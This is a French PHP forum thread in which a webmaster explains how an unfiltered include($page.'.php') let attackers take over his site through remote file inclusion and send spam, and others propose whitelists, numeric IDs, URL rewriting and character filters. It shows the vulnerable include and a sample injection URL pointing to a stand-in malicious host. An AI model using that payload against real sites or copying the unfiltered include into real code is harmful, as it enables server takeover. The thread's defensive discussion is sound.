Discussion :

[omdafer]

Bonjours à tous,

j'ai trouvé utile de poster cette discution car bon nombre d'entre nous ont fait, fait ou feront cette erreur.

Dans un de mes post http://www.developpez.net/forums/sho...d.php?t=510537 j'ai conseillé à un membre de ce forum d'inclure des pages dans sont index.php par la mêthode GETS.
ex :
Avec URL

monsite/index.php?page=macategorie&valeur1=...

.
Donc mon index.php j'avais :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

include($page.".php");

Un beau jour, j'avais un entretien d'embauche pour webmaster/webdesigner. Content d'un de mes sites, j'ai voulu le montrer. Et là surprise, ils ont vu mon site mais version hacker. L'hebergeur de ce site m'a averti le même jour par ce message

mails sent in week 12 : 40001

. Vous l'avez bien compris, 40001 spam envoyé depuis mon site. de ces c***** qui em***** le monde.

Bref, le problème c’est que php peut inclure n’importe quoi, et même des fichiers distants. Donc si quelqu’un appelle l’URL :

votreSite.com/index.php?page=http://www.siteMechant.com/scriptMechant.txt?

Le “?” final sert à faire tomber le “.php” dans notre include.
Le contenu du fichier “scriptMechant.txt” sera interprété et exécuté localement (sur votre serveur). Donc le pirate peut tout faire, comme lister les fichiers, les modifier ou effacer.

Pour eviter ce genre d'attaque, il faut filtrer ce qui passe dans la variable "$page" dans mon exemple. Il faut faire une liste de fichier à autorisé l'inclure.

Ma methode de 1er secour était de faire :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
 
$pagevrai="";
//A rajouter à chaque nouveau fichier à inclure
if($page=="monfichier1") $pagevrai=$page;
if($page=="monfichier2") $pagevrai=$page;
...
if($page=="") $pagevrai="intro";
//Si "$page" non vide ou mauvaise  "$page" alors afficher erreur 
if($page!=$pagevrai) $pagevrai="erreur";
 
include ($pagevrai".".php");

cet article http://maconnect.ch/bg/?p=8 propose d'autres solutions et donne des détails sur ce type de faille.

[Tsilefy]

Salut,

il y aquelques règles de base à respecter absolument. L'un d'entre eux : ne jamais faire confiance à ce qui provient de l'extérieur. Y compris les requête Get / Post.
Ensuite, au lieu d'indiquer directement les noms des fichiers à inclure dans la requête, on peut par exemple attribuer un id à chaque page. Au lieu d'avoir :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

index.php?page=mapage

tu auras

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

index.php?id=753

Cette correspondance, très simple à réaliser avec une bdd ou même un simple fichier, t'évite 1) d'indiquer au monde entier que tu inclus des pages dans ton script; et 2) de bloquer automatiquement toute inclusion de fichiers distants. Tu peux même filtrer le champ 'id' pour que ça soit un entier uniquement, par ex, et rejeter tout 'id' qui ne soit pas entier.
Tu peux également faire de l'url rewriting, et au lieu d'avoir

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

monsite/index.php?page=macategorie&valeur1=7523

tu auras :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

monsite/macategorie/7523.html

Résultat: pour le pirate, tout site sera un site statique, donc sans intérêt pour son script.

[omdafer]

Peux tu m'en dire plus sur l'url rewriting ?

[Tsilefy]

Je pourrais, mais sans doute pas mieux que ça :
http://apache.developpez.com/cours/?...s#urlrewriting

Ces trois cours devraient répondre à toutes tes questions.

[Fladnag]

sans passer par des ID numeriques, que personnellement je n'aime pas du tout pour les raisons suivantes :
* URL qui ne ressemble a rien
* Certains robots de moteurs de recherche n'indexent pas les pages ayant des id numeriques
* Prise de tete pour faire un lien vers la page ("attend... cette page c'est le numero... 5789 ! A moins que ce soit 5788 ?")

on peut tres bien indiquer le nom de la page en respectant quelques regles simples :

* Interdire FORMELLEMENT tout les caracteres sensibles, on peut meme n'autoriser que l'alphanumerique.
Par exemple :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
$aListeUtilises = array_keys(count_chars($_GET['page'], 1));
$aListeInterdit = explode('@', chunk_split(":/.?&", 1, '@'));
if (count(array_intersect($aListeUtilises, $aListeInterdit)) > 0) {
  die("Non non non, tu ne me pirateras pas ^^");
}

Cela permet deja d'éviter de charger des URL distantes.
A noter que l'on peut aussi modifier la variable de configuration allow_url_fopen pour éviter ca.

* Valider le contenu :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
$aListePagesAutorisees=array(
"index",
"liens",
"contacts",
);
 
if (!in_array($_GET['page'], $aListePagesAutorisees)) {
  die('Non plus !');
}

Enfin, tu as aussi la possibilité d'utiliser la fonction file_exists($_GET['page'].'.php'); pour verifier que ton fichier existe bien dans l'arborescence de ton site avant de l'inclure.

[omdafer]

D'ou l'interêt de la reécriture d'url.
Merci Tsilefy pour l'info, ça fonctionne bien et ça passe nikel pour le sitemap google.

J'ai bien fait de poster ce sujet .